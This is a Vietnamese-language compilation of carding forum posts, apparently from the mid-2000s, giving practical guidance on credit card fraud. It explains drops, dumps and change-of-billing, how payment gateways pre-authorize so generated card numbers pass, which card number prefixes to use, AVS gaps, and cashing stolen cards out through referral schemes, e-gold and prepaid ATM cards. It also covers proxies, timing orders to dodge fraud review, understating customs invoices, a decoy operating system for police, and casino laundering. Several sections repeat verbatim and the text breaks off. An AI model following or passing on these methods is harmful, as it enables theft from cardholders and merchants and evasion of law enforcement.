US : shopping.com , froogle.com --> điền mã hàng cần mua . VD : hx4705
UK,EU: kelkoo.com , froogle.co.uk
AU: shopbot.com.au
Froogle và Google: Keywords: VD: shop hx4705 .com.au
ii)Ship gián tiếp về Vietnam:
Vì áp dụng phương pháp ship nhầm nước nên bạn chỉ cần tìm shop cho ship international là có thể về được VN.(kể cả shop chỉ ship trong 1 châu lục)
Dùng froogle/google:
Keywords: VD: shop hx4705 "international shipping" .co.uk cart
"worldwide shipping"
USPS Global
Phụ luc 2: Cách xin giảm thuế lúc gặp Hải quan:
Cách này chỉ áp dụng được đối với hàng ship về VN mà bưu điện HN gửi giấy báo ra nhận hàng ( lúc ship bạn chọn shipping menthod loại rẻ tiền nhất , thường là dịch vụ Airmail , USPS,Royal Mail,Hong Kong post (loại của nhà nước), KHÔNG phải là UPS,FedEx hay DHL).
Bạn phải gặp Hải quan tại bưu điện.Lúc gặp,bạn có thể nói mình là học sinh --> ít tiền . Bạn nên nêu ra thêm các lý do để biện minh rằng:
+ Hàng không có giá trị cao (bọn HQ gà đối với những lô hàng bé.Tốt nhất là bạn làm thế nào để bọn nó không thấy Invoice hoặc làm thế nào đó để invoice khai khống (tức là khai giá trị thấp hơn).
+ Hàng mua về để mình dùng , không phải để đi đem bán.
-----> Xin được linh động.
Nếu ship ít --> cứ nói là nhận hàng lần đầu --> Không biết là phải đóng thuế nên cũng mang ít tiền.
Lời kết :
Bài viết của tôi chứa 2 kiến thức mới được công bố : phương pháp ship nhầm nước và cách điền Billing form (nguyên lý 1) . Công cụ mạnh nhất chính là Ship nhầm nước.Hơn nữa, khi ship bằng phương pháp này , Vietnam sẽ không bị mang tiếng xấu --> khó bị kiện --> các VNese Leaders sẽ không truy cứu và mình cũng sẽ được an toàn hơn.
Tại sao tôi ship hàng ? Bởi các lợi ích sau:
+ Cá nhân : Bạn sẽ cảm thấy sung sướng vì tự nhiên có đồ xịn , có tiền tiêu , hãnh diện với bạn bè.
+ Đất nước : tăng tổng sản phẩm quốc nội,cũng giống như bạn thu được ngoại tệ vậy --> Làm giàu cho đất nước.
+ Xã hội : các shops sau khi bị chơi xong sẽ tăng cường security
Tuy vậy, sau 2 năm rưỡi sử dụng CC và đã gặt hái được chút ít thành công , tôi quyết định từ bỏ việc sử dụng CC chùa từ tháng 10 này . Bởi dù thế nào,việc xài CC chùa cũng tương tự như việc bạn vào nhà 1 người rùi lấy cắp 1 chiếc xe máy của họ vậy, therefore that is not good . Furthermore , việc xài CC nhiều sẽ ảnh hưởng đến nhân cách của mình sau này(không đàng hoàng).Với lại, năm nay tui học lớp 12 , sắp phải thi ĐH , lại còn thi TOEFL và SAT nữa --> " Làm việc gì cũng phải có giới hạn "
Kinh nghiệm SHIP HÀNG
Phần 1 là thuật ngữ và 1 số kiến thức cơ bản, tuy dài dòng nhưng sẽ rất có ích nếu bạn hiểu nó. Phần 2 sẽ về các tips nhỏ để vượt qua gateway và shop.
1. Thuật ngữ:
.:. Drop : người nhận hàng cho bạn, có thể ở chung country hoặc ở country khác. Tại sao cần drop ? 1 số shop k0 ship đến country của bạn nên cần drop. Drop còn được dùng để làm fone vf cho bạn hoặc làm cho shipping name có vẻ hợp lệ hơn là 1 azn name ( asian ).
.:. Carding: dùng card của người khác để mua 1 thứ gì đó, online hoặc hàng thực sự.
.:. Cash out: lấy tiền mặt ra trực tiếp từ bank hoặc atm.
.:. Dump: data được viết lên lên ATM card. Data này theo format đã được encrypt theo algo của bank
.:. COB ( change of billing ): khi có 1 cc full info như mother name, SSN ( social security number, DOB ( date of birth ) vv, có thể call bank để kêu bank thay địa chỉ billing bằng địa chỉ của mình, lưu ý việc này là hoàn toàn hợp lệ.
.:. Bin: số xác định bank, là 6 số đầu tiên của cc.
2. Ship hàng
Cần lưu ý tới 1 số điểm sau:
Tuyệt đối đừng nên ship hàng bằng free mail. 1 số shop khi gặp free email sẽ cẩn thận và bắt buộc qua 1 số thủ tục. Và chuyện lấy 1 mail account như AOL account k0 khó. AOL cho phép 59 ngày trial, bạn chỉ cần có 1 cc hợp lệ và sẽ setup được 1 AOL account. Lưu ý AOL có 1 loại browser gọi là AOL browser, khi dùng cái này bạn sẽ connect vào AOL network và có 1 ip của AOL. ip này k0 bao giờ bị blacklist hoặc bị ban, vì nếu nó ban thì nó đã ban cả chục triệu người sử dụng AOL khác. 1 điểm khác khi lập AOL account là nên lấy account name trùng tên với cc, thí dụ như là jones.pro.shipper@aol có vẻ thật hơn là daicavn@aol.com
Hiểu payment gateway: paygate và bank gateway interface với nhau theo 2 bước: Pre-Authorization và AUthorization. Trong db của paygate có list các bank và interface, khi paygate nhận cc sẽ check 6 số đầu để biết bank nào và construct 1 string bao gồm cc+name+exp+address nếu có AVS ( address verification system) hoặc cc+name+exp nếu k0 có AVS và code Pre-Auth hoặc Auth. Thứ tự giữa cc name date tùy thuộc vào bank gateway. Sau khi nó construct string đó sẽ send tới bank, ở bước Pre-Authorization bank chỉ check xem cc đó có thuộc range của mình k0, và check cc đó và exp có match với nhau, cuối cùng là check limit ban đầu của cc có đủ mua món hàng đó k0. Tùy mỗi trường hợp bank sẽ tạo ra 1 response code gửi về cho gateway, như là insufficient fund, date not valid ( 2co báo lỗi date not valid là Do Not Honor ). Lưu ý ở bước Pre-Authorization này thực sự bank KHÔNG check database của mình, và cũng chưa charge cc. 1 số paygate có thể config real-time processing hoặc manual process, realtime thì paygate sẽ thực hiện Authorization luôn, có nghĩa là buộc bank phải query db của mình và fund tiền cho acc của paygate, từ đó paygate sẽ fund tiền cho merchant. Còn manual processing là paygate thực hiện Pre-Auth để coi tính hợp lệ của payment và sau đó sẽ gom cc đi charge 1 lượt ở bước Auth.
Biết được những thứ này để làm gì ? Trong mấy ngày qua, sss mò ra được bank range của 1 số bank bên AU nơi sss ở, và tự tạo ra cc valid, cc này được lợi ở chỗ nào: đây là cc valid sẽ qua được bước Pre-Auth vì bank sẽ check đúng range của mình, đúng exp và valid, thực sự cc k0 có thật trong bank. Cái này dùng để mua soft instant activation, mua hàng của whole seller hoặc mua mobile dạng plan ( dạng trả trước, verify cc valid nó sẽ send mobile cho mình rồi cuối mỗi tháng charge cc 1 lần). Cách làm những chuyện này sss sẽ post sau.
AVS là gì ? AVS là hệ thống check địa chỉ bill đối với những gateway bên us. Với những paygate bên us khi nhận 1 cc thuộc bank của us khi construct cái string để send cho bank gateway nó sẽ thêm vào đó địa chỉ của cc, bank sẽ thực hiện AVS và gửi response là address mismatch nếu địa chỉ sai. Nhưng cùng 1 gateway đó, nếu gặp cc k0 thuộc us như cc các nước châu á, cc finland thì nó k0 check được AVS do k0 có connection với bank và k0 có xác định được format của address. Chỉ những paygate lớn như paypal mới có thể check avs đối với bank international, và ngay cả paypal cũng k0 check được avs, cvv2 của các cc thuộc hk, bangladesh.
Điều này có lợi như thế nào: bạn mua hàng ở website us dùng cc 1 số nước khác như cc bangladesh, có thể bỏ địa chỉ bill = địa chỉ ship và làm cho transaction trở thành valid. Ngược lại mua site uk chẳng hạn bỏ cc k0 thuộc uk như cc us vào và bỏ địa chỉ mình vào vẫn có thể qua. Có rất nhiều site như vậy, sss chỉ thí dụ vài site: eddiebauer.com (hỏi mdblq xem ship thế nào) và lik-sang.com.
Tránh ship vào thứ 6: tuy những shop lớn như dell.com, apple.com thứ 7 k0 làm việc, nhưng tốt nhất bạn tránh những shop nhỏ hơn. shop owner có thể có login vào cuối tuần và review lại những order, nó càng có nhiều thời gian rảnh thì càng có khả năng phát hiện ra transaction là fraud.
IP: 1 public proxy từ đó xuất phát nhiều fraud order sẽ được liệt vào blacklist, và các order sử dụng proxy đó chắc chắn sẽ bị cancel hoặc bị red flag để qua confirmation. amazone và những site khác liên tục cập nhật blacklist. ngoài ra amazon còn maintain 1 list các address đen dính líu tới ship hàng. VD địa chỉ nhà của sss là 1 địa chỉ đen, cứ hễ ship sách amazon về số nhà sss là automatically cancelled sau 15 phút . Tuy nhiên amazon.com k0 dùng chung db với amazon.co.uk tuy 2 site giống nhau như 1. Do đó bạn bị blacklist amazon k0 có nghĩa là bạn bị blacklist ở .co.uk
Hướng dẫn chuyển tiền từ CC sang egold
Trước hết tui lưu ý là chỉ những ai có CC (có CVV2) còn sống mới chơi được món này nha!!
Công việc cần làm:
đăng ký ngay một tài khoản trong hxxp://www.Friendlypay.net
Sau đó các bạn chỉ cần đăng ký vào trang web này
hxxp://macleaders.com/ref.php?refer=7312&club=gold
sau khi đăng ký,bạn sẽ phải trả một số tiền nho nhỏ :59.59 $ thông qua 2CO.com
Rồi đăng nhập vào tài khoản này,vào mục Edit frofile ,điền địa chỉ mail đã đăng ký trong Friendlypay.net
Sau đó ,bạn có thể dùng nhiều CC khác (tất nhiên là còn sống!!) để đăng ký làm downline cho tài khoản đầu tiên của bạn(tất nhiên là tài khoản goldclub thì bạn mới được tiền!!)
Mỗi downline trực tiếp mà bạn giới thiệu được (paid member) thì bạn sẽ được trả 30$ vào tài khoản ban đầu,ở lever 2 bạn sẽ được thưởng 6$ vào tài khoản.
xong rồi ,bạn vào mục commission ,điền số tiền muốn rút vào ô trống,rồi nhấn vào thanh bên dưới Request this amount...
Mọi giao dịch được tính đến ngày 31 của mỗi tháng,nếu trễ,sẽ tính vào tháng sau.
đến ngày 15 của tháng sau nó sẽ trả tiền vào tài khoản Friendlypay.net của bạn
Từ Friendlypay.net ,bạn có thể chuyểb tiền sang egold dễ dàng !!
Chúc các bạn kiếm được thật nhiều tiền từ vụ làm ăn này!!! 4.gif
Nhưng chơi ít ít thôi nhé.Để dành ăn dần,đừng ăn tham quá cùng một lúc!!
*Bài copied thôi,nhưng anh em nào thấy có ích thì Thank mình 1 cái nhá!Mình cũng đã test và rất thấy rất good
Tí Kinh Nghiệm Ship Hàng
Cũng chẳng có gì cả Khi ship hàng nên chọn các CC có 6 số đầu như sau :
Trước hết tui lưu ý là chỉ những ai có CC (có CVV2) còn sống mới chơi được món này nha!!
Công việc cần làm:
đăng ký ngay một tài khoản trong hxxp://www.Friendlypay.net
Sau đó các bạn chỉ cần đăng ký vào trang web này
hxxp://macleaders.com/ref.php?refer=7312&club=gold
sau khi đăng ký,bạn sẽ phải trả một số tiền nho nhỏ :59.59 $ thông qua 2CO.com
Rồi đăng nhập vào tài khoản này,vào mục Edit frofile ,điền địa chỉ mail đã đăng ký trong Friendlypay.net
Sau đó ,bạn có thể dùng nhiều CC khác (tất nhiên là còn sống!!) để đăng ký làm downline cho tài khoản đầu tiên của bạn(tất nhiên là tài khoản goldclub thì bạn mới được tiền!!)
Mỗi downline trực tiếp mà bạn giới thiệu được (paid member) thì bạn sẽ được trả 30$ vào tài khoản ban đầu,ở lever 2 bạn sẽ được thưởng 6$ vào tài khoản.
xong rồi ,bạn vào mục commission ,điền số tiền muốn rút vào ô trống,rồi nhấn vào thanh bên dưới Request this amount...
Mọi giao dịch được tính đến ngày 31 của mỗi tháng,nếu trễ,sẽ tính vào tháng sau.
đến ngày 15 của tháng sau nó sẽ trả tiền vào tài khoản Friendlypay.net của bạn
Từ Friendlypay.net ,bạn có thể chuyểb tiền sang egold dễ dàng !!
Chúc các bạn kiếm được thật nhiều tiền từ vụ làm ăn này!!! 4.gif
Nhưng chơi ít ít thôi nhé.Để dành ăn dần,đừng ăn tham quá cùng một lúc!!
*Bài copied thôi,nhưng anh em nào thấy có ích thì Thank mình 1 cái nhá!Mình cũng đã test và rất thấy rất good
Tí Kinh Nghiệm Ship Hàng
Cũng chẳng có gì cả Khi ship hàng nên chọn các CC có 6 số đầu như sau :
440804
|
431901
|
431904
|
431907
|
Đó là First
Bank và BoA. First Bank là good nhất
RÚT TIỀN TỪ EGOLD VỀ ATM NÈ ! nhanh chóng +tiện lợi !
NGOÀI CÁCH RÚT TIỀN = WU!
CÓ CÁCH RÚT QUA ATM NHANH CHÓNG ĐÂY !
BẢO ĐẢM KO SCAM ! QUAN TRỌNG LÀ TRONG EGOLD CÓ TIỀN KO THÔI?
Mình khuyên các bạn nên mua một cái atm card tại đây giá $19.95/cái.
Phương thức thanh toán qua e-gold, xlcard này được xem là loại card nhanh nhất hiện nay, thời gian bạn nhận được tiền là từ 9h-12h tối (giờ VN). Bạn có thể rút tiền tại Vietnam thông qua các máy ATM của Vietcombank, mỗi lần rút phí là $4.
Hãy mua cho mình một cái card này mà xài khỏi phải đổi tiền qua trung gian cho mắc công.
Ai muốn mua thì vào đây.
XL Card hxxp://xlcard.com/xlcardonlinestore.htm
Loại card này có thể rút tại các máy ATM của VCB không phải là có thể chuyển tiền về thẻ ATM của VCB ! Vì thế có thẻ ATM hay không, không quan trọng !
Khi làm xong nó gởi cho mình một cái card cùng số PIN và Passcode !
Dùng card và số PIN để rút tiền tại các máy ATM có hổ trợ Visa và Master (ATM của VCB, AZN,... Những ATM như BIDV, ICB, Ngân Hàng Đông Á,... thì không rút được. )
Dùng passcode để truy cập vào acc trên internet !
Mổi lần rút tiền tại ATM bạn sẽ bị bọn XL Card nó chặt một số fee ($4 như smartinvest nói ) ngoài ra còn bị VCB chặt thêm 20k fee chuyển đổi ngoại tệ gì đấy nữa vì thế nên mổi lần rút thì rút nhiều lưôn chứ rút ít tốn fee lắm !
Chuyển tiền từ e-gold vào, bạn bị trừ 3% tổng số tiền chuyển vào $1.95.
Phí hàng tháng là $4.95.
Phí rút ra là $4.
Tối đa cho một ngày rút là $500, mà hiện nay theo mình biết thì các máy ATM của VCB và ANZ có giao dịch quốc tế đều giới hạn số tiền rút là 2 triệu một lần, nhớ là 1 lần chứ không phải một ngày.
Có nghĩa là bạn có thể rút thoải mái không giới hạn số lần khi nào hết $500/ngày thì thôi.
Vì VCB và ANZ có giới hạn số tiền rút là 2 triệu/lần nên phí hơi mắc, nếu muốn rút hết $500 thì tối thiều phải rút 4 lần, phí là 4*4=$16.
Do đó mình không biết ngoài máy rút tiền của 2 ngân hàng trên, ở VN còn có máy rút tiền nào chấp nhận giao dịch quốc tế mà không giới hạn số tiền/lần không !
ORDER : ví dụ
(pay = E-GOLD nhá )
[QUOTE]
Thank you for your order. For Visa card orders allow 10 to 14 business days for delivery.
The ATM debit cards will be shipped within 3 days of the purchase date.
(Note: If you ordered a Visa card you will receive two envelopes. One contains the card and one contains the the PIN numbers.
There are 2 PIN numbers inside the PIN mailer. One is the 4 digit PIN for access to ATM's and debit POS. The other one is a
7 digit PIN used to access your statement online at www.xlcard.com. Do not lose these as it will cause you to re-order a new card!)
Order Number : 1188
Placed : 09/08/2005 09:32:37 EDT
Ship To: Bill To:
XXXX XXXX
XXXX @gmail.com XXXX @gmail.com
84-XXXX 84-XXXX
(Địa chỉ ) (Địa chỉ )
Code Name Quantity Price/Ea. Total
-------------------------------------------------------------------------------------------
XPADC XL Prepaid ATM Debit Card 1 $19.95 $19.95
Shipping: USPS: $0.00
Sales Tax: $0.00
-------------------------------------------------------------------------------------------
Total: 19.95
Yêu Cầu Cần Thiết Khi Ship
Khi shopping online cần lưu ý sau:
1> IP(proxy), SOCKs nhất thiết phải good.
2> Kiểm tra CC sống hay chết bằng GOOGLE wallet hoặc Yahoo cũng được. ( có thể bỏ qua nếu bác muốn ăn nhanh )
3> Vô site cần mua hàng.
1> dụng FINDNOT để fake IP là nhanh nhất. Nhưng IP ngon thường được post free tại mọt số web sau:
www.proxy4free.com (Proxy and port )
www.aliveproxy.com ( VPN, check IP, proxy, port, socks)
www.stayinvisible.com ( check IP, offer proxy and port)
http://ip2location.com để kiểm tra IP của mình .
Không nên dùng port 80 , port này chỉ để xem X thôi , nên dùng 8080 , 444 , 3128 .. đây là những port thông dụng nhất , và khi đã fake IP , trước khi vào buy thì nên vào
3> Một số site mua hàng :
www.ecost.com (bán hàng IPOD ngon lắm)
www.pagecomputer.com (ship cực nhanh)
www.chumbo.com ( hàng VGA card cực kỳ xịn và hiếm - hơi đắt- tiền nào của đó)
www.thenerds.net ( hàng độc ..nhưng ít detail để tham khảo - check cực nhanh)
RÚT TIỀN TỪ EGOLD VỀ ATM NÈ ! nhanh chóng +tiện lợi !
NGOÀI CÁCH RÚT TIỀN = WU!
CÓ CÁCH RÚT QUA ATM NHANH CHÓNG ĐÂY !
BẢO ĐẢM KO SCAM ! QUAN TRỌNG LÀ TRONG EGOLD CÓ TIỀN KO THÔI?
Mình khuyên các bạn nên mua một cái atm card tại đây giá $19.95/cái.
Phương thức thanh toán qua e-gold, xlcard này được xem là loại card nhanh nhất hiện nay, thời gian bạn nhận được tiền là từ 9h-12h tối (giờ VN). Bạn có thể rút tiền tại Vietnam thông qua các máy ATM của Vietcombank, mỗi lần rút phí là $4.
Hãy mua cho mình một cái card này mà xài khỏi phải đổi tiền qua trung gian cho mắc công.
Ai muốn mua thì vào đây.
XL Card hxxp://xlcard.com/xlcardonlinestore.htm
Loại card này có thể rút tại các máy ATM của VCB không phải là có thể chuyển tiền về thẻ ATM của VCB ! Vì thế có thẻ ATM hay không, không quan trọng !
Khi làm xong nó gởi cho mình một cái card cùng số PIN và Passcode !
Dùng card và số PIN để rút tiền tại các máy ATM có hổ trợ Visa và Master (ATM của VCB, AZN,... Những ATM như BIDV, ICB, Ngân Hàng Đông Á,... thì không rút được. )
Dùng passcode để truy cập vào acc trên internet !
Mổi lần rút tiền tại ATM bạn sẽ bị bọn XL Card nó chặt một số fee ($4 như smartinvest nói ) ngoài ra còn bị VCB chặt thêm 20k fee chuyển đổi ngoại tệ gì đấy nữa vì thế nên mổi lần rút thì rút nhiều lưôn chứ rút ít tốn fee lắm !
Chuyển tiền từ e-gold vào, bạn bị trừ 3% tổng số tiền chuyển vào $1.95.
Phí hàng tháng là $4.95.
Phí rút ra là $4.
Tối đa cho một ngày rút là $500, mà hiện nay theo mình biết thì các máy ATM của VCB và ANZ có giao dịch quốc tế đều giới hạn số tiền rút là 2 triệu một lần, nhớ là 1 lần chứ không phải một ngày.
Có nghĩa là bạn có thể rút thoải mái không giới hạn số lần khi nào hết $500/ngày thì thôi.
Vì VCB và ANZ có giới hạn số tiền rút là 2 triệu/lần nên phí hơi mắc, nếu muốn rút hết $500 thì tối thiều phải rút 4 lần, phí là 4*4=$16.
Do đó mình không biết ngoài máy rút tiền của 2 ngân hàng trên, ở VN còn có máy rút tiền nào chấp nhận giao dịch quốc tế mà không giới hạn số tiền/lần không !
ORDER : ví dụ
(pay = E-GOLD nhá )
[QUOTE]
Thank you for your order. For Visa card orders allow 10 to 14 business days for delivery.
The ATM debit cards will be shipped within 3 days of the purchase date.
(Note: If you ordered a Visa card you will receive two envelopes. One contains the card and one contains the the PIN numbers.
There are 2 PIN numbers inside the PIN mailer. One is the 4 digit PIN for access to ATM's and debit POS. The other one is a
7 digit PIN used to access your statement online at www.xlcard.com. Do not lose these as it will cause you to re-order a new card!)
Order Number : 1188
Placed : 09/08/2005 09:32:37 EDT
Ship To: Bill To:
XXXX XXXX
XXXX @gmail.com XXXX @gmail.com
84-XXXX 84-XXXX
(Địa chỉ ) (Địa chỉ )
Code Name Quantity Price/Ea. Total
-------------------------------------------------------------------------------------------
XPADC XL Prepaid ATM Debit Card 1 $19.95 $19.95
Shipping: USPS: $0.00
Sales Tax: $0.00
-------------------------------------------------------------------------------------------
Total: 19.95
Yêu Cầu Cần Thiết Khi Ship
Khi shopping online cần lưu ý sau:
1> IP(proxy), SOCKs nhất thiết phải good.
2> Kiểm tra CC sống hay chết bằng GOOGLE wallet hoặc Yahoo cũng được. ( có thể bỏ qua nếu bác muốn ăn nhanh )
3> Vô site cần mua hàng.
1> dụng FINDNOT để fake IP là nhanh nhất. Nhưng IP ngon thường được post free tại mọt số web sau:
www.proxy4free.com (Proxy and port )
www.aliveproxy.com ( VPN, check IP, proxy, port, socks)
www.stayinvisible.com ( check IP, offer proxy and port)
http://ip2location.com để kiểm tra IP của mình .
Không nên dùng port 80 , port này chỉ để xem X thôi , nên dùng 8080 , 444 , 3128 .. đây là những port thông dụng nhất , và khi đã fake IP , trước khi vào buy thì nên vào
3> Một số site mua hàng :
www.ecost.com (bán hàng IPOD ngon lắm)
www.pagecomputer.com (ship cực nhanh)
www.chumbo.com ( hàng VGA card cực kỳ xịn và hiếm - hơi đắt- tiền nào của đó)
www.thenerds.net ( hàng độc ..nhưng ít detail để tham khảo - check cực nhanh)
Những Điều Nên Biết Về Ship
Thật sự k0 có thứ đc cho là 100% secure/anonymous trên net. Proxies, chains, socks, VPN chỉ add 1 phần nào đó thôi. Việc tuân theo các qui định về bảo mật [ở đây nói về personal security] và về mã hóa [encryption] sẽ giúp rất nhiều trong việc ngăn chặn các cặp mắt tò mò [police, LEs, some other idiots ...] vào data và thói quen surfing của mình, cùng các chứng tích để lại khi surf web.
1 người chỉ có thể đạt được sự an toàn tương đối, nếu có tổ chức quản lý data và áp dụng các kỹ thuật encryption tốt. Việc này có thể chia làm 3 layer và áp dụng các kỹ thuật khác nhau cho mỗi layer.
Layer 1: full system encryption
Lớp này về việc bảo vệ thông tin ở cấp thấp nhất: OS và file system của nó. Mọi data được lưu trong hdd ở dạng k0 được mã hóa. Mục đích ở đây là ta encrypt mọi thứ trong HDD sao cho k0 có 1 thông tin nào được save vào hdd mà k0 được mã hóa, kể cả bootlog.
Tool: DriveCrypt Plus Pack (DCPP)
http://www.securstar.com/products_drivecryptpp.php
DCPP là soft duy nhất cho phép làm full system encryption, và trustable. Các phần sau đây cần đọc để hiểu:
- Pre-Boot Authentication
- How does it work ?
- Hidden Operating System
Sẽ giải thích tính năng của mỗi cái sau.
OK giả dụ bạn mua 1 hdd mới khoảng 40gb, tạo 1 partition vd 20gb để store private data, với file system là FAT32 [ NO NTFS, sẽ nói sau ] và install 1 OS lên đó, run DCPP full encrypt partion đó. Xong layer 1
Layer 2: Tạo 1 hidden OS
DCPP dùng 1 thứ là keystore, đại khái như 1 folder để chứa key, key này dùng để encrypt/decrypt 1 system. Ở bước này, tạo 2 keystore, trong mỗi keystore tạo 1 key. Passwd để access mỗi keystore phải complex vì nó allow 2 dòng cho mỗi pass. Tại sao phải dùng 2 keystore mỗi cái chứa 1 key ? 1 trong 2 key sẽ là fake key để boot-up cái clean system [ phần hdd còn lại sau khi đã partition 20gb cho hidden OS sẽ được dùng để install 1 clean OS]. Trong 2 key, 1 key là fake để boot up clean system, 1 key là key để boot up real system, nơi bạn hide private data. Create key xong, encrypt clean system với fake key, và tạo boot-auth.
Làm như vậy, khi boot nếu enter key cho clean OS, và bạn sẽ boot bằng clean OS, no evidence, trong trường hợp bạn bị court order phải supply password cũng k0 tìm thấy gì, bởi vì hidden OS thật sự invisible nếu boot qua OS khác, và được encrypted. Nếu k0 có key thứ 2 cho hidden OS thì k0 ai có thể boot được qua hidden OS.
Lập lại các bước cho layer 2: sau khi tạo 1 partition cho hidden OS với file sys là FAT32, phần còn lại của HDD sẽ được dùng để install 1 OS ngụy trang. Boot qua clean OS, start DCPP và press "Hidden OS", locate keystore cho hidden OS, và enter password, tạo hidden OS bằng cách enter các thông số như space, file system type .. và create, tới đây bạn có 1 hidden OS. --> xong layer 2, có 1 hidden OS để store private info, surfing, carding, và 1 clean OS cùng 1 pass để give out cho LEs.
Layer 3:
Ok điểm yếu trong toàn bộ cái này, nằm ở keystore, do key chứa trong key store là random, nên passwd keystore để access key là điểm quan trọng khiến người ta có thể moi ra private info. Tuy nhiên DCPP support 1 thứ gọi là steganography, nghĩa là khi tạo keystore, ta có thể hide keystore vào 1 file bmp hoặc wav, burn file này vào CD lẫn lộn giữa các file pix, music khác. Never store keystore trên cùng hdd, pass của keystore cũng phải mạnh, DCPP support tới 2 dòng passwd.
Ngoài ra, để đạt mức security cao hơn, ta còn có thể encrypt keystore của mình vào các container khác và store nó đâu đó trong các encrypted container từ các program khác, dưới các thuật toán như AES, tripleDES,blowfish...
Xong layer 3, bạn có 1 system gần như hoàn hảo. Nhưng mọi chuyện sẽ khác nếu connect system đó vào internet.
Cái Này Khó Nói Quá Trình Bày Đại Vậy Ai Hiểu Thì thui ko Hiểu Cũng Chịu Nói Chung Là Ngừa police Vào Khám Computer
một thủ thuật nho nhỏ để tăng % thành công khi ship
khi các yếu tố khác như socks, cvv, ngày ship hàng....đã được làm kỹ lưỡng mấy bác cũng nên xem xét thời gian mà mình order hàng
giờ bên VN mình nhanh hơn bên US khỏang 10 tiếng thí dụ bây giờ là 4 giờ chiều thì bên đó mới khoảng 6 giờ sáng
thủ thuật là gì? các bạn nên ship hàng vào tối khoảng từ 19h-21h vì sao? lúc đó tụi bên kia đang làm việc nhận được order sẽ không nghi ngờ lắm
một số site đặc biệt check điều này kỹ nếu như drop của bạn ở US khi thấy thời gian order hàng vào khoảng tối khuya(là buổi sáng của mình), mấy thằng tọc mạch nếu nghi ngờ nó sẽ gửi mail nói lung tung lang tang nhưng nó sẽ đế thêm câu như: "sao bạn lại order hàng này vào lúc tối khuya thế" thì kiếm câu gì nói đại , nhưng đa số không hỏi mà nó sẽ xem xét như đây là một yếu tố phụ để xem có duyệt cái order này không
Thật sự k0 có thứ đc cho là 100% secure/anonymous trên net. Proxies, chains, socks, VPN chỉ add 1 phần nào đó thôi. Việc tuân theo các qui định về bảo mật [ở đây nói về personal security] và về mã hóa [encryption] sẽ giúp rất nhiều trong việc ngăn chặn các cặp mắt tò mò [police, LEs, some other idiots ...] vào data và thói quen surfing của mình, cùng các chứng tích để lại khi surf web.
1 người chỉ có thể đạt được sự an toàn tương đối, nếu có tổ chức quản lý data và áp dụng các kỹ thuật encryption tốt. Việc này có thể chia làm 3 layer và áp dụng các kỹ thuật khác nhau cho mỗi layer.
Layer 1: full system encryption
Lớp này về việc bảo vệ thông tin ở cấp thấp nhất: OS và file system của nó. Mọi data được lưu trong hdd ở dạng k0 được mã hóa. Mục đích ở đây là ta encrypt mọi thứ trong HDD sao cho k0 có 1 thông tin nào được save vào hdd mà k0 được mã hóa, kể cả bootlog.
Tool: DriveCrypt Plus Pack (DCPP)
http://www.securstar.com/products_drivecryptpp.php
DCPP là soft duy nhất cho phép làm full system encryption, và trustable. Các phần sau đây cần đọc để hiểu:
- Pre-Boot Authentication
- How does it work ?
- Hidden Operating System
Sẽ giải thích tính năng của mỗi cái sau.
OK giả dụ bạn mua 1 hdd mới khoảng 40gb, tạo 1 partition vd 20gb để store private data, với file system là FAT32 [ NO NTFS, sẽ nói sau ] và install 1 OS lên đó, run DCPP full encrypt partion đó. Xong layer 1
Layer 2: Tạo 1 hidden OS
DCPP dùng 1 thứ là keystore, đại khái như 1 folder để chứa key, key này dùng để encrypt/decrypt 1 system. Ở bước này, tạo 2 keystore, trong mỗi keystore tạo 1 key. Passwd để access mỗi keystore phải complex vì nó allow 2 dòng cho mỗi pass. Tại sao phải dùng 2 keystore mỗi cái chứa 1 key ? 1 trong 2 key sẽ là fake key để boot-up cái clean system [ phần hdd còn lại sau khi đã partition 20gb cho hidden OS sẽ được dùng để install 1 clean OS]. Trong 2 key, 1 key là fake để boot up clean system, 1 key là key để boot up real system, nơi bạn hide private data. Create key xong, encrypt clean system với fake key, và tạo boot-auth.
Làm như vậy, khi boot nếu enter key cho clean OS, và bạn sẽ boot bằng clean OS, no evidence, trong trường hợp bạn bị court order phải supply password cũng k0 tìm thấy gì, bởi vì hidden OS thật sự invisible nếu boot qua OS khác, và được encrypted. Nếu k0 có key thứ 2 cho hidden OS thì k0 ai có thể boot được qua hidden OS.
Lập lại các bước cho layer 2: sau khi tạo 1 partition cho hidden OS với file sys là FAT32, phần còn lại của HDD sẽ được dùng để install 1 OS ngụy trang. Boot qua clean OS, start DCPP và press "Hidden OS", locate keystore cho hidden OS, và enter password, tạo hidden OS bằng cách enter các thông số như space, file system type .. và create, tới đây bạn có 1 hidden OS. --> xong layer 2, có 1 hidden OS để store private info, surfing, carding, và 1 clean OS cùng 1 pass để give out cho LEs.
Layer 3:
Ok điểm yếu trong toàn bộ cái này, nằm ở keystore, do key chứa trong key store là random, nên passwd keystore để access key là điểm quan trọng khiến người ta có thể moi ra private info. Tuy nhiên DCPP support 1 thứ gọi là steganography, nghĩa là khi tạo keystore, ta có thể hide keystore vào 1 file bmp hoặc wav, burn file này vào CD lẫn lộn giữa các file pix, music khác. Never store keystore trên cùng hdd, pass của keystore cũng phải mạnh, DCPP support tới 2 dòng passwd.
Ngoài ra, để đạt mức security cao hơn, ta còn có thể encrypt keystore của mình vào các container khác và store nó đâu đó trong các encrypted container từ các program khác, dưới các thuật toán như AES, tripleDES,blowfish...
Xong layer 3, bạn có 1 system gần như hoàn hảo. Nhưng mọi chuyện sẽ khác nếu connect system đó vào internet.
Cái Này Khó Nói Quá Trình Bày Đại Vậy Ai Hiểu Thì thui ko Hiểu Cũng Chịu Nói Chung Là Ngừa police Vào Khám Computer
một thủ thuật nho nhỏ để tăng % thành công khi ship
khi các yếu tố khác như socks, cvv, ngày ship hàng....đã được làm kỹ lưỡng mấy bác cũng nên xem xét thời gian mà mình order hàng
giờ bên VN mình nhanh hơn bên US khỏang 10 tiếng thí dụ bây giờ là 4 giờ chiều thì bên đó mới khoảng 6 giờ sáng
thủ thuật là gì? các bạn nên ship hàng vào tối khoảng từ 19h-21h vì sao? lúc đó tụi bên kia đang làm việc nhận được order sẽ không nghi ngờ lắm
một số site đặc biệt check điều này kỹ nếu như drop của bạn ở US khi thấy thời gian order hàng vào khoảng tối khuya(là buổi sáng của mình), mấy thằng tọc mạch nếu nghi ngờ nó sẽ gửi mail nói lung tung lang tang nhưng nó sẽ đế thêm câu như: "sao bạn lại order hàng này vào lúc tối khuya thế" thì kiếm câu gì nói đại , nhưng đa số không hỏi mà nó sẽ xem xét như đây là một yếu tố phụ để xem có duyệt cái order này không
Kinh nghiệm rửa tiền (casino)
Tut đầy đủ luôn.
vào viet-casino.com
down soft đánh bài về
xong dùng sock cap cho cái soft này
